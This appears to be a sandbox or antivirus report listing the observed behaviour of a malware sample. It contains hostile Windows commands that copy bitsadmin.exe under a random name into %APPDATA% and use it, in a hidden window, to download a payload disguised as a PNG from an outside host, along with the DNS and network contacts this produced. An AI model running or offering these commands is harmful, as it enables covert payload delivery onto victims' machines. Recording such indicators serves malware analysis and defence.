Technical Information
- '%APPDATA%\ejfxhxas.exe' /transfer jXoMMa /download https://chaeonfire.com/911fire/01693730226/gstatic.png %APPDATA%\gstatic.png
- %APPDATA%\ejfxhxas.exe
- 'ch###nfire.com':443
- DNS ASK ch###nfire.com
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\EjfxhXas.exe (with hidden window)
- '%APPDATA%\ejfxhxas.exe' /transfer jXoMMa /download https://chaeonfire.com/911fire/01693730226/gstatic.png %APPDATA%\gstatic.png (with hidden window)
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\EjfxhXas.exe